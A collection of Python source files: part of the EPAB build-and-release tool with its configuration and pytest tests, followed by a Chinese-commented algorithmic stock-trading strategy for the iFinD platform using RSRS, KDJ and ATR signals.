folder = Path('./artifacts')
folder.mkdir(exist_ok=True)
for pattern in config.ARTIFACTS():
for artifact in Path('.').glob(pattern):
src = str(artifact.absolute())
dst = str(folder.absolute())
shutil.copy(src, dst)
LOGGER.info('copying artifact: %s', f'{src} -> {dst}')
def _check_dirty(reason: str):
LOGGER.info('checking repo')
if CTX.repo.is_dirty(untracked=True):
LOGGER.error('repository is dirty: %s', reason)
sys.exit(1)
def _remove_av_artifacts():
if CTX.appveyor:
LOGGER.info(f'running on APPVEYOR')
if Path('appveyor.yml').exists():
Path('appveyor.yml').unlink()
CTX.repo.checkout(os.getenv('APPVEYOR_REPO_BRANCH'))
def _print_build_info(current_branch: str, next_version: str):
info = [
f'Current EPAB version -> {__version__}',
f'Current branch -> {current_branch}',
f'Latest tag -> {CTX.repo.get_latest_tag()}',
f'Next version -> {next_version}',
]
LOGGER.info('build info: %s', ',\n'.join(info))
def _run_linters(ctx):
ctx.invoke(epab.linters.lint)
_check_dirty('linters produced artifacts')
LOGGER.info('linters OK')
def _run_tests(ctx):
ctx.invoke(epab.cmd.pytest, long=True)
LOGGER.info('tests OK')
def _create_wheel():
python_exe = sys.executable.replace('\\', '/')
elib_run.run(f'{python_exe} setup.py bdist_wheel')
LOGGER.info('setup OK')
def _upload_to_twine():
if config.UPLOAD_TO_TWINE():
elib_run.run(f'twine upload dist/* --skip-existing', mute=True)
LOGGER.info('twine OK')
def _update_av_build_name(next_version):
build_version = f'{next_version}-{os.getenv("APPVEYOR_BUILD_NUMBER")}-{os.getenv("APPVEYOR_REPO_COMMIT")}'
elib_run.run(f'appveyor UpdateBuild -Version {build_version}')
LOGGER.info('build version: %s', build_version)
def _set_release_description():
if CTX.appveyor:
# Check for empty extended commit message
_extended_commit_message = os.getenv('APPVEYOR_REPO_COMMIT_MESSAGE_EXTENDED')
if _extended_commit_message is not None:
epab.utils.AV.set_env_var('RELEASE_DESCRIPTION', f'"{_extended_commit_message}"')
os.putenv('RELEASE_DESCRIPTION', _extended_commit_message)
else:
epab.utils.AV.set_env_var('RELEASE_DESCRIPTION', '"No description"')
os.putenv('RELEASE_DESCRIPTION', 'No description')
@epab.utils.timeit
def _release(ctx: click.Context):
CTX.stash = False
_remove_av_artifacts()
_set_release_description()
current_branch = CTX.repo.get_current_branch()
next_version = epab.utils.get_next_version()
_print_build_info(current_branch, next_version)
_check_dirty('initial check failed')
LOGGER.info('running on commit: %s', CTX.repo.latest_commit())
_run_linters(ctx)
_run_tests(ctx)
if CTX.appveyor:
_copy_artifacts()
CTX.repo.tag(next_version, overwrite=True)
_clean()
_check_dirty('last check before build')
if config.MAKE_GRAPH():
ctx.invoke(epab.cmd.graph)
_create_wheel()
if current_branch == 'master':
_upload_to_twine()
if current_branch != 'master':
CTX.repo.push_tags()
if CTX.appveyor:
epab.utils.AV.set_env_var('EPAB_VERSION', next_version)
_update_av_build_name(next_version)
@click.command()
@click.pass_context
def release(ctx):
"""
Runs tests and creates:
- wheel binary distribution and pushes it to the cheese shop
- release tag and pushes it back to origin
"""
_release(ctx)
```
#### File: epab/core/config.py
```python
import logging
import pathlib
import elib_config
CHANGELOG_DISABLE = elib_config.ConfigValueBool(
'changelog', 'disable', description='Disable changelog building', default=False
)
CHANGELOG_FILE_PATH = elib_config.ConfigValuePath(
'changelog', 'file_path', description='Path to changelog file', default='CHANGELOG.md'
)
CHANGELOG_FILE_PATH.must_be_file()
TEST_RUNNER_OPTIONS = elib_config.ConfigValueString(
'test', 'runner_options', description='Additional options for test run', default=''
)
TEST_DURATION_COUNT = elib_config.ConfigValueInteger(
'test', 'duration_count', description='Amount of "slow" tests to show', default=10
)
TEST_DURATION_COUNT.set_limits(min_=0, max_=50)
TEST_TARGET = elib_config.ConfigValueString(
'test', 'target', description='Target of pytest', default='test'
)
TEST_COVERAGE_FAIL_UNDER = elib_config.ConfigValueInteger(
'test', 'coverage_fail_under', description='Minimal coverage to pass tests', default=20
)
TEST_COVERAGE_FAIL_UNDER.set_limits(min_=0, max_=100)
TEST_PYTEST_TIMEOUT = elib_config.ConfigValueInteger(
'test', 'timeout', description='Timeout in seconds for pytest runner', default=300
)
TEST_PYTEST_TIMEOUT.set_limits(min_=0, max_=3600)
LINT_LINE_LENGTH = elib_config.ConfigValueInteger(
'lint', 'line_length', description='Linter max line width', default=120
)
LINT_LINE_LENGTH.set_limits(min_=0, max_=500)
PACKAGE_NAME = elib_config.ConfigValueString(
'package_name', description='Package name'
)
FREEZE_ENTRY_POINT = elib_config.ConfigValueString(
'freeze', 'entry_point', description='Main entry point for pyinstaller', default=''
)
FREEZE_DATA_FILES = elib_config.ConfigValueList(
'freeze', 'data_files', description='PyInstaller data-files list', element_type=str, default=[]
)
DOC_REPO = elib_config.ConfigValueString(
'doc', 'repo', description='Documentation repository on Github', default=''
)
DOC_FOLDER = elib_config.ConfigValuePath(
'doc', 'folder', description='Local documentation directory', default='./doc'
)
DOC_FOLDER.must_be_dir()
QUIET = elib_config.ConfigValueBool(
'quiet', description='Less console output', default=False
)
VERBOSE = elib_config.ConfigValueBool(
'verbose', description='More console output', default=False
)
TEST_AV_RUNNER_OPTIONS = elib_config.ConfigValueString(
'appveyor', 'test_runner_options', description='Additional command line options for tests run on AV',
default='--long'
)
ARTIFACTS = elib_config.ConfigValueList(
'appveyor', 'artifacts', description='List of artifacts for Appveyor', element_type=str, default=[]
)
FLAKE8_EXCLUDE = elib_config.ConfigValueString(
'lint', 'flake8_exclude', description='List of comma separated files for flake8 to exclude', default=''
)
MYPY_ARGS = elib_config.ConfigValueString(
'lint', 'mypy_args', description='Additional MyPy arguments', default=''
)
QT_RES_SRC = elib_config.ConfigValueString(
'qt', 'res_src', description='Qt resource file (.qrc) location', default=''
)
QT_RES_TGT = elib_config.ConfigValueString(
'qt', 'res_tgt', description='Compiled Qt resource file (.py) target location', default=''
)
UPLOAD_TO_TWINE = elib_config.ConfigValueBool(
'twine', 'upload', description='Upload package to Twine after build',
default=True,
)
MAKE_GRAPH = elib_config.ConfigValueBool(
'graph', 'make',
description='Generate graphs using PyReverse',
default=True,
)
def setup_config(epab_version: str):
"""
Set up elib_config package
    :param epab_version: installed version of EPAB as a string
"""
logger = logging.getLogger('EPAB')
logger.debug('setting up config')
elib_config.ELIBConfig.setup(
app_name='EPAB',
app_version=epab_version,
config_file_path='pyproject.toml',
config_sep_str='__',
root_path=['tool', 'epab']
)
elib_config.write_example_config('pyproject.toml.example')
if not pathlib.Path('pyproject.toml').exists():
raise FileNotFoundError('pyproject.toml')
elib_config.validate_config()
```
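For context, a hedged sketch of how this module is typically consumed; it assumes a `pyproject.toml` with a `[tool.epab]` table is present (implied by the `root_path` passed to `elib_config` above), and the version string is a placeholder:

```python
# Hedged sketch: initialise EPAB's configuration and read a couple of values.
# Requires a pyproject.toml containing a [tool.epab] table (e.g. with
# package_name defined); the exact file contents are an assumption.
from epab.core import config

config.setup_config('0.0.0')    # writes pyproject.toml.example, then validates
print(config.PACKAGE_NAME())    # elib_config values are read by calling them
print(config.TEST_TARGET())
```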
#### File: epab/utils/_ensure_exe.py
```python
import logging
import sys
import elib_run
LOGGER = logging.getLogger('EPAB')
def ensure_exe(exe_name: str, *paths: str): # pragma: no cover
"""
Makes sure that an executable can be found on the system path.
Will exit the program if the executable cannot be found
Args:
exe_name: name of the executable
paths: optional path(s) to be searched; if not specified, search the whole system
"""
if not elib_run.find_executable(exe_name, *paths):
LOGGER.error('could not find "%s.exe" on this system', exe_name)
sys.exit(-1)
```
#### File: test/test_cmd/test_freeze.py
```python
import datetime
from pathlib import Path
import elib_run
import pytest
from mockito import and_, contains, expect, mock, when
import epab.exc
import epab.utils
from epab.cmd import _freeze as freeze
from epab.cmd._freeze import _format_data_file, site_package
from epab.core import CTX, config
def test_freeze_cli(cli_runner):
when(freeze)._freeze('version')
cli_runner.invoke(freeze.freeze, ['version'])
def test_freeze():
config.FREEZE_ENTRY_POINT.default = 'test'
when(freeze)._install_pyinstaller()
when(freeze)._patch('version')
expect(elib_run).run('pipenv clean', failure_ok=True)
expect(elib_run).run(contains('pyinstaller --log-level=WARN'), timeout=300)
freeze._freeze('version')
def test_freeze_no_entry_point(caplog):
expect(freeze, times=0)._install_pyinstaller()
expect(freeze, times=0)._patch(...)
freeze._freeze('version')
assert 'no entry point defined, skipping freeze' in caplog.text
def test_patch():
repo = mock(spec=epab.utils.Repo)
CTX.repo = repo
now = datetime.datetime.utcnow()
timestamp = f'{now.year}{now.month}{now.day}{now.hour}{now.minute}'
package_name = config.PACKAGE_NAME()
when(repo).get_current_branch().thenReturn('branch')
when(repo).get_sha().thenReturn('sha')
when(elib_run).run(
'dummy.exe '
f'./dist/{package_name}.exe '
'/high version '
'/va /pv version '
f'/s desc {package_name} '
f'/s product {package_name} '
f'/s title {package_name} '
f'/s copyright {now.year}-etcher '
'/s company etcher '
'/s SpecialBuild version '
f'/s PrivateBuild version-branch_sha-{timestamp} '
'/langid 1033'
)
when(epab.utils).resource_path(...).thenReturn('dummy.exe')
freeze._patch('version')
def test_install_pyinstaller_installed():
expect(elib_run).run('pyinstaller --version').thenReturn(('version ', 0))
freeze._install_pyinstaller()
def test_install_pyinstaller_not_installed():
when(elib_run).run('pip install pyinstaller==3.4')
when(elib_run).run('pyinstaller --version') \
.thenRaise(elib_run.ExecutableNotFoundError('pyinstaller')) \
.thenReturn(('version', 0))
freeze._install_pyinstaller()
def test_clean_spec(cli_runner):
config.PACKAGE_NAME.default = 'test'
config.FREEZE_ENTRY_POINT.default = 'test'
spec_file = Path('test.spec')
spec_file.touch()
version = '0.1.0'
when(freeze)._freeze(version)
cli_runner.invoke(freeze.freeze, [version, '-c'])
assert not spec_file.exists()
def test_with_data_files():
config.FREEZE_ENTRY_POINT.default = 'test'
config.PACKAGE_NAME.default = 'test'
config.FREEZE_DATA_FILES.default = ['file1', 'file2']
when(freeze)._install_pyinstaller()
when(freeze)._patch('version')
expect(elib_run).run('pipenv clean', failure_ok=True)
expect(elib_run).run(and_(
contains('pyinstaller --log-level=WARN'),
contains('--add-data "file1"'),
contains('--add-data "file2"')), timeout=300)
freeze._freeze('version')
@pytest.mark.parametrize(
'data_file_src, expected',
[
('{site_package}/pytest.py', site_package() + '/pytest.py')
]
)
def test_format_data_file(data_file_src, expected):
actual = _format_data_file(data_file_src)
assert expected == actual
assert Path(actual).exists()
```
#### File: test/test_repo/conftest.py
```python
from pathlib import Path
import pytest
import epab.utils
class _CTX:
obj = {'dry_run': False}
def pytest_collection_modifyitems(items):
for item in items:
if 'test_repo/' in item.nodeid:
item.add_marker(pytest.mark.long)
@pytest.fixture()
def repo(dummy_git_repo):
dummy_git_repo.create()
_repo = epab.utils.Repo()
yield _repo
@pytest.fixture(params=[[f'DUMMY_FILE_{x}' for x in range(5)] for _ in range(1)])
def file_set(request):
file_set_ = list(map(Path, request.param))
for file in file_set_:
file.touch()
yield file_set_
```
#### File: test/test_repo/test_merge.py
```python
from pathlib import Path
import pytest
def test_merge(repo):
repo.create_branch_and_checkout('develop')
Path('test').touch()
repo.commit('test')
sha = repo.get_sha()
short_sha = repo.get_short_sha()
repo.checkout('master')
repo.merge('develop')
assert sha == repo.get_sha()
assert short_sha == repo.get_short_sha()
def test_merge_dry_run(repo):
repo.create_branch_and_checkout('develop')
Path('test').touch()
repo.commit('test')
sha = repo.get_sha()
repo.checkout('master')
def test_merge_dirty(repo):
Path('test').write_text('clean')
assert 'test' in repo.untracked_files()
repo.commit('test')
repo.create_branch_and_checkout('develop')
repo.checkout('master')
Path('test').write_text('dirty')
with pytest.raises(SystemExit):
repo.merge('develop')
```
#### File: test_utils/test_next_version/conftest.py
```python
import time
import typing
from pathlib import Path
import pytest
import epab.utils
from epab.core import CTX
UML_DIR = Path('./test/uml').absolute()
UML_DIR.mkdir(exist_ok=True)
class Repo(epab.utils.Repo):
def __init__(self):
epab.utils.Repo.__init__(self)
self.uml = ['@startuml']
def commit(
self,
message: str,
files_to_add: typing.Optional[typing.Union[typing.List[str], str]] = None,
allow_empty: bool = False,
):
super(Repo, self).commit(message, files_to_add, allow_empty)
self.uml.append(f'{self.get_current_branch()} -> {self.get_current_branch()}: commit')
def merge(self, ref_name: str):
super(Repo, self).merge(ref_name)
self.uml.append(f'{ref_name} ->o {self.get_current_branch()}: merge')
def checkout(self, reference):
init_branch = self.get_current_branch()
super(Repo, self).checkout(reference)
self.uml.append(f'{init_branch} ->> {reference}: checkout')
def create_branch_and_checkout(self, branch_name):
self.create_branch(branch_name)
self.checkout(branch_name)
if CTX.appveyor:
time.sleep(1)
else:
time.sleep(0.1)
def tag(self, tag: str, overwrite: bool = False):
if tag is None:
tag = epab.utils.get_next_version()
branch = self.get_current_branch()
self.uml.append(f'{branch} --> {branch}: TAG: {tag}')
# self.uml.append(f'ref over {branch}: {tag}')
super(Repo, self).tag(tag, overwrite)
def mark(self, text: str):
self.uml.append(f'ref over {self.get_current_branch()}: {text}')
# noinspection PyTypeChecker
@pytest.fixture(name='repo')
def _git_repo(request, dummy_git_repo, monkeypatch):
test_name = request.node.name
# noinspection SpellCheckingInspection
uml = [
'@startuml',
f'title {test_name}',
'skinparam ParticipantPadding 20',
'skinparam BoxPadding 10',
'participant master'
]
try:
monkeypatch.delenv('TEAMCITY_VERSION')
except KeyError:
pass
dummy_git_repo.create()
repo = Repo()
CTX.repo = repo
yield repo
uml.extend(repo.uml)
# noinspection SpellCheckingInspection
uml.append('@enduml')
uml = [x.replace('/', '.') for x in uml]
# noinspection SpellCheckingInspection
Path(UML_DIR, test_name + '.puml').write_text('\n'.join(uml))
```
#### File: test_utils/test_next_version/test_calver.py
```python
import pytest
from hypothesis import given, strategies as st
from mockito import mock, verifyStubbedInvocationsAreUsed, when
from epab.utils import _next_version as nv
@pytest.mark.long
@given(
year=st.integers(min_value=1950, max_value=8000),
month=st.integers(min_value=1, max_value=12),
day=st.integers(min_value=1, max_value=31)
)
def test_calver(year, month, day):
now = mock()
now.year = year
now.month = month
now.day = day
when(nv)._get_datetime().thenReturn(now)
assert nv._get_calver() == f'{year}.{month:02d}.{day:02d}'
verifyStubbedInvocationsAreUsed()
```
#### File: test_utils/test_next_version/test_get_next_version.py
```python
import pytest
from mockito import verifyStubbedInvocationsAreUsed, when
from epab.utils import _next_version, get_next_version
CALVER = '2018.1.2'
@pytest.fixture(autouse=True)
def _mock_calver():
when(_next_version)._get_calver().thenReturn(CALVER)
yield
verifyStubbedInvocationsAreUsed()
def _check_next_version(repo, expected_version):
next_version = get_next_version()
assert expected_version == next_version
repo.mark(f'calver: {CALVER}')
repo.mark(f'next version: {next_version}')
def test_next_version_empty_repo(repo):
assert not repo.list_tags()
assert repo.get_current_branch() == 'master'
_check_next_version(repo, f'{CALVER}.1')
def test_next_version_stable(repo):
assert repo.get_current_branch() == 'master'
repo.tag(f'{CALVER}.1')
_check_next_version(repo, f'{CALVER}.2')
def test_next_version_stable_older_calver(repo):
assert repo.get_current_branch() == 'master'
repo.tag(f'2018.1.1.1')
repo.tag(f'2018.1.1.2')
_check_next_version(repo, f'{CALVER}.1')
@pytest.mark.long
def test_next_version_alpha_empty_repo(repo):
assert repo.get_current_branch() == 'master'
repo.create_branch_and_checkout('test')
_check_next_version(repo, f'{CALVER}.1a1+test')
@pytest.mark.long
def test_next_version_alpha(repo):
assert repo.get_current_branch() == 'master'
repo.tag('2018.1.1.1')
repo.tag('2018.1.1.2')
_check_next_version(repo, f'{CALVER}.1')
repo.tag(f'{CALVER}.1')
repo.create_branch_and_checkout('test')
repo.tag(f'{CALVER}.2a1+test')
repo.tag(f'{CALVER}.2a2+test')
_check_next_version(repo, f'{CALVER}.2a3+test')
repo.checkout('master')
_check_next_version(repo, f'{CALVER}.2')
``` |
{
"source": "1332927388/-",
"score": 2
} |
#### File: -/src/xiyanghong.py
```python
from iFinDPy import *
import datetime as dt
import time
import datetime
import pandas as pd
import statsmodels.api as sm
import numpy as np
import talib
def initialize(account):
    account.a_periods=10 # holding-period limit (days)
    account.b_periods=3 # holding-period limit (days)
    account.hold={} # holding days per position
    account.holdSl=[] # holdings of the short-term swing strategy
    account.holdHb=[] # holdings of the ultra-short momentum strategy
    account.security = '000016.SH' # market-level risk control uses the SSE index
    account.maxStock=20 # maximum number of stocks selected per day
    account.defend=False # market-level risk-control flag
    account.N = 20 # use the previous N days of data
    account.M = 400 # M parameter of the RSRS indicator
    #account.execPoint=['1000','1015','1030','1045','1100','1115','1129','1400','1415','1430','1445','1456'] # sell-check times
    account.execPoint=['1000','1030','1100','1129','1400','1430','1456'] # sell-check times
# 短期波段策略的选股条件
condition_sl='''
股本规模是大盘股,
股票简称不包含 st,
市盈率(pe)>0 倍,
boll<收盘价,
非新股,
非停牌
'''
# 超短追涨的选股条件
condition_hb='''
股本规模不是大盘股,
昨天涨停,
非新股,
股票简称不包含 st,
boll<收盘价,
非停牌
'''
    # fetch candidate stocks from wencai and store them under different fields
    # sl: short-term swing
    get_iwencai(condition_sl,"sl")
    # hb: ultra-short momentum (limit-up chasing)
get_iwencai(condition_hb,"hb")
run_daily(func=dayPart, time_rule='after_open', hours=0, minutes=1)
return
# pre-market handler
def before_trading_start(account,data):
    # daily market risk assessment
    account.defend=secureRatio_d(account,data)
    #account.defend=False
    if account.defend==True:
        log.info("日级风控平仓")
    #account.defend=5
    # assemble the candidate list into a DataFrame
account.hb=pd.DataFrame(
{
"symbol":account.hb,
"buypoint":np.zeros(len(account.hb)),
"market":np.zeros(len(account.hb)),
"kdj":np.zeros(len(account.hb)),
"order_id":np.zeros(len(account.hb))
})
return
def handle_data(account,data):
    # at each execPoint, run risk control and sell checks for the limit-up strategy
if get_time() in account.execPoint and account.defend==False:
if secureRatio_m(account,data)==True:
pourAll(account)
else:
for stock in account.holdHb:
b_sellCheck(stock,data,account)
return
def dayPart(account,data):
    # market-level risk control
if account.defend==True:
#平仓
pourAll(account)
else:
delayCheck(data,account)
if getTend(account,trade_signal(account,data))==True:
#pourB(account)
log.info("偏好大盘")
#大盘,执行 A 策略
# 9:30 调用每日短线波段操作函数
for stock in account.sl:
a_buyCheck(stock,account)
# 卖出符合条件的 A
a_sellCheck(account,data)
# 风险控制
a_riskDefend(account)
else:
#pourA(account)
log.info("偏好小盘")
            # run strategy B
            # previous-day risk control
for stock in account.holdHb:
if b_prevRiskDefend(stock,data)==True and stock in account.hold:
order(stock,0,style="MarketOrder")
log.info("超短前日风控卖出"+stock)
account.holdHb.pop(dictLoc(account.holdHb,stock))
account.hold.pop(stock)
            # handle the opening call auction
for i in range(len(account.hb)):
account.hb.ix[i,'buypoint']=b_buyCheck(account.hb.ix[i,'symbol'],data)
account.hb.ix[i,'market']=b_getMarket(account.hb.ix[i,'symbol'])
account.hb.ix[i,'kdj']=b_getKDJ(account.hb.ix[i,'symbol'])
#account.hb=account.hb[account.hb.market<=8000000000]
account.hb=account.hb.sort_values(by=['buypoint','kdj'],ascending=[False,True])
account.hb=account.hb[0:min(5,len(account.hb))]
            # buy high-priority stocks
for i in account.hb.index:
if account.hb.ix[i,'buypoint']==1 and len(account.holdHb)<15 and account.hb.ix[i,'symbol'] not in account.holdHb:
atr = getATR(account.hb.ix[i,'symbol'])
if not isNaN(atr[-1]):
#amount = min(1200000,int(account.cash/(atr[-1]*20)))
stock = account.hb.ix[i,'symbol']
log.info("超短高优先买入"+stock)
trade_value(stock,min(1000000,500000*atr[-1]))
account.holdHb.append(account.hb.ix[i,'symbol'])
            # buy low-priority stocks
for i in account.hb.index :
if account.hb.ix[i,'buypoint']==0 and len(account.holdHb)<15 and account.hb.ix[i,'symbol'] not in account.holdHb:
atr = getATR(account.hb.ix[i,'symbol'])
if not isNaN(atr[-1]):
#amount = int(account.cash/(atr[-1]*20))
trade_value(account.hb.ix[i,'symbol'],min(1000000,500000*atr[-1]))
log.info("超短低优先买入"+account.hb.ix[i,'symbol'])
account.holdHb.append(account.hb.ix[i,'symbol'])
return
# post-market handler
def after_trading_end(account, data):
    # increment holding days for every open position
    for stock in list(account.positions):
        if stock not in account.hold:
            account.hold[stock] = 0
        else:
            account.hold[stock] += 1
    # drop records for positions that no longer exist
    # (iterate over copies so the containers can be modified safely)
    for stock in list(account.hold):
        if stock not in list(account.positions):
            account.hold.pop(stock)
    for stock in list(account.holdHb):
        if stock not in list(account.positions):
            account.holdHb.remove(stock)
    for stock in list(account.holdSl):
        if stock not in list(account.positions):
            account.holdSl.remove(stock)
return
# =======================
# Common helpers (util)
# --------------------------------------
# all trades go through these unified helpers, which include order cancellation
def trade_target(stock,aim):
    # trade to a target number of shares
id=order_target(stock,aim)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return
def trade_value(stock,value):
    # trade a target cash value
id=order_value(stock,value)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return id
def trade_amount(stock,amount):
    # trade a target quantity
id=order(stock,amount)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
return
def secureRatio_d(account,data):
close = history('000001.SH', ['close'], 20, '1d', False, 'pre').iloc[:,0]
MA5 = talib.MA(np.array(close), timeperiod=5)
if((MA5[-1]<MA5[-2])and(MA5[-2]<MA5[-3])):
#if MA5[-1]<MA5[-2]:
return True
else:
return False
def secureRatio_m(account,data):
q_rate = history('000001.SH', ['quote_rate'], 20, '1m', False, 'pre')['quote_rate']
if(len(q_rate)<1 or q_rate[-1]<-0.8):
return True
else:
close = history('000001.SH', ['close'], 20, '30m', False, 'pre').iloc[:,0]
MA5 = talib.MA(np.array(close), timeperiod=5)
#if((MA5[-1]<MA5[-2])and(MA5[-2]<MA5[-3])):
if (MA5[-1]<MA5[-2]):
return True
else:
return False
# check whether a value is NaN
def isNaN(params):
return params!=params
# liquidate a single stock
# (still checks every holding list here)
def pourStock(stock,account):
trade_target(stock,0)
if stock in account.hold:
account.hold.pop(stock)
if stock in account.holdHb:
account.holdSl.remove(stock)
if stock in account.holdHb:
account.holdHb.remove(stock)
# liquidate all stocks
# shares bought today cannot be sold yet, so pick stocks from account.hold
def pourA(account):
temp=[]
for i in account.holdSl:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdSl=list(set(account.holdSl) ^ set(temp))
return
def pourB(account):
temp=[]
for i in account.holdHb:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdHb=list(set(account.holdHb) ^ set(temp))
return
def pourAll(account):
temp=[]
for i in account.hold:
stock=account.positions[i].symbol
trade_target(stock,0)
temp.append(stock)
account.hold={}
account.holdSl=list(set(account.holdSl) ^ set(temp))
account.holdHb=list(set(account.holdHb) ^ set(temp))
return
# locate the index of a value in a container
def dictLoc(dict,value):
i=0
for params in dict:
if value==params:
return i
i+=1
return -1
# RSI calculation
def getRSI(df):
return 100-100/(1+rs(df))
def rs(df):
up=df['up'][1:].mean()
down=df['down'][1:].mean()
if not down==0:
return -df['up'][1:].mean()/df['down'][1:].mean()
else:
return 0
# ATR calculation
def getATR(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
return talib.ATR(np.array(high), np.array(low), np.array(close), timeperiod=14)
def trade_signal(account,data):
N = account.N
M = account.M
    # compute yesterday's RSRS for each benchmark index
hz300_RSRS = get_RSRS(data,'000300.SH',N,M)
zz500_RSRS = get_RSRS(data,'000905.SH',N,M)
return [hz300_RSRS,zz500_RSRS]
# 5. compute the RSRS score
def get_RSRS(data,stock,n,m):
values = data.attribute_history(stock,['high','low'],n+m-1,'1d', skip_paused=True)
high_array = values.high.values[-(n+m-1):]
low_array = values.low.values[-(n+m-1):]
    scores = np.zeros(m)  # slope of each rolling window
    for i in range(m):
        # n-day window for this iteration
        high = high_array[i:i+n]
        low = low_array[i:i+n]
        # slope of a single window
        x = low  # low is the independent variable
        X = sm.add_constant(x)  # add the constant term
        y = high  # high is the dependent variable
        model = sm.OLS(y,X)  # ordinary least squares
        results = model.fit()
        score = results.params[1]
        scores[i] = score
        # record the R-squared (coefficient of determination) of the last window
        if i==m-1:
            R_squared = results.rsquared
    # z-score of the most recent slope
    z_score = (scores[-1]-scores.mean())/scores.std()
    # RSRS score
    RSRS_score = z_score*R_squared
    return RSRS_score
def getTend(account,signals):
    # keep the larger of the two RSRS values
signal = max(signals)
if signals[0]>signals[1]:
return True
else:
return False
# detect whether an upward or downward cross has occurred
def checkthrough(a,b,terms=20):
    # check whether an upward cross happened earlier
if a[len(a)-1]>b[len(b)-1]:
for i in range(min(terms-1,len(a)-1,len(b)-1)):
if a[len(a)-i-1]<b[len(b)-i-1]:
return 1,i
    # check whether a downward cross happened earlier
elif a[len(a)-1]<b[len(b)-1]:
for i in range(min(terms-1,len(a)-1,len(b)-1)):
if a[len(a)-i-1]>b[len(b)-i-1]:
return -1,i
return 0,-1
# get the close prices of stock over the past terms periods with step size step
def getHistory(stock, terms,start=0,step='1d'):
close=history(stock, ['close'], terms+start, step, True,None)['close']
return close[0:terms]
# handle positions that have exceeded their holding-period limit
def delayCheck(data,account):
temp=[]
for stock in account.hold:
if (stock in account.holdSl) and (account.hold[stock] > account.a_periods):
log.info("持有到期卖出:"+stock)
trade_target(stock, 0)
if stock in account.hold:
temp.append(stock)
if stock in account.holdSl:
account.holdSl.remove(stock)
for stock in account.hold:
        if (stock in account.holdHb) and (account.hold[stock] > account.b_periods):
log.info("持有到期卖出:"+stock)
trade_target(stock, 0)
if stock in account.hold:
temp.append(stock)
if stock in account.holdHb:
account.holdHb.remove(stock)
for stock in temp:
account.hold.pop(stock)
# market safety helpers
# wrapped helpers for fetching dates and times
# get the current date
def get_date():
return get_datetime().strftime("%Y%m%d")
# get the day of the week
def get_weekday():
date = get_date()
return datetime.datetime.strptime(date, "%Y%m%d").weekday()+1
# get the current time as HHMM
def get_time():
datatime=get_datetime()
datatime=pd.to_datetime(datatime, unit='s')
datatime=datatime.strftime('%Y-%m-%d %H:%M:%S')
timeArray=time.strptime(datatime,"%Y-%m-%d %H:%M:%S")
return time.strftime("%H%M", timeArray)
# =======================
# Strategy A (shortLine: short-term swing)
# --------------------------------------
# buy check
def a_buyCheck(stock, account):
buypoint = a_condition_MA_b(stock)+a_condition_Flow_b(stock)+a_condition_Volume_b(stock)+a_condition_KDJ_b(stock)+a_condition_WeekTor_b(stock)
if buypoint > 3 and len(account.holdSl)<10:
atr = getATR(stock)
if not isNaN(atr[-1]):
#amount = int(account.cash/(atr[-1]*20))
trade_value(stock,min(1000000,800000*atr[-1])) #按量买入
# trade_amount(stock,amount) #按量买入
account.holdSl.append(stock) #添加记录
log.info("波段买入"+stock)
return
# MA condition
def a_condition_MA_b(stock):
    # requires MA5 > MA10 > MA20
price = history(stock, ['open', 'close'], 20, '1d', False, 'pre', is_panel=1)
close = price['close']
MA5 = talib.MA(np.array(close), timeperiod=5)
MA10 = talib.MA(np.array(close), timeperiod=10)
MA20 = talib.MA(np.array(close), timeperiod=20)
#if(MA5[-1] > MA10[-1]):
if(MA5[-1] > MA10[-1]) and (MA10[-1] > MA20[-1]):
return 1
else:
return 0
# net money-flow condition
def a_condition_Flow_b(stock):
    date = get_date()
    j = get_weekday()
    # main-capital net inflow positive for two consecutive weeks
delta = datetime.timedelta(days=j)
start1 = (get_last_datetime()-delta).strftime("%Y%m%d")
# flow1 为从 start1 到 date 为止的换手率
flow1 = get_money_flow([stock], start1, date, ['net_flow_rate'], count=None,is_panel=0)
this_week = sum(flow1[stock].net_flow_rate)
start2 = (get_last_datetime()-datetime.timedelta(days=j+7)).strftime("%Y%m%d")
end2 = (get_last_datetime()-datetime.timedelta(days=j+1)).strftime("%Y%m%d")
# flow1 为从 start1 到 date 为止的换手率
flow2 = get_money_flow([stock], start2, end2, ['net_flow_rate'], count=None,is_panel=0)
last_week = sum(flow2[stock].net_flow_rate)
if (this_week > 0) and (last_week > 0):
return 1
else:
return 0
# volume condition
def a_condition_Volume_b(stock):
    # current-week volume greater than 1.5x last week's
date = get_date()
# 获取历史周级数据
weekdata = get_candle_stick(stock, end_date=date, fre_step='week', fields=['volume'], skip_paused=False, fq='pre', bar_count=20, is_panel=1)
volume = weekdata.iloc[:, 0]
if volume[-1] > 1.5*volume[-2]:
return 1
else:
return 0
# KDJ condition
def a_condition_KDJ_b(stock):
price = history(stock, ['close', 'high', 'low'], 20, '1d', False, 'pre', is_panel=1)
high = price['high']
low = price['low']
close = price['close']
K, D = talib.STOCH(np.array(high), np.array(low),
np.array(close), 9, 3, 0, 3, 0)
if(K[-1] > K[-2]) and (K[-2] < D[-2]) and (K[-1] > D[-1]):
return 1
else:
return 0
# turnover condition
def a_condition_WeekTor_b(stock):
    # weekly turnover above 15%: return 1 if met, otherwise 0
j = get_weekday()
price = history(stock, ['turnover_rate'], 20, '1d', False, 'pre', is_panel=1)
turnover_rate = price['turnover_rate']
weektor = sum(turnover_rate[-5:])
if(weektor > 0.15):
return 1
else:
return 0
# --------------------------------------
# sell check
def a_sellCheck(account,data):
for stock in account.holdSl:
if stock in account.hold:
sellPoint = a_condition_MA_s(stock)+a_condition_Flow_s(stock)+a_condition_RSI_s(stock)+a_condition_Quate_s(stock,data)
temp=[]
if sellPoint >= 1:
if stock in account.holdSl:
# 平仓
id=order_target(stock,0)
orders = get_open_orders(id)
if orders and len(orders)>1:
cancel_order(orders)
else:
log.info("波段卖点卖出"+stock)
temp.append(stock)
account.holdSl=list(set(account.holdSl) ^ set(temp))
account.hold.pop(stock)
return
# MA condition
def a_condition_MA_s(stock):
    # MA5 crosses below MA10
price = history(stock, ['close'],20, '1d', False, 'pre', is_panel=1)
close = price['close']
MA5 = talib.MA(np.array(close), timeperiod=5)
MA10 = talib.MA(np.array(close), timeperiod=10)
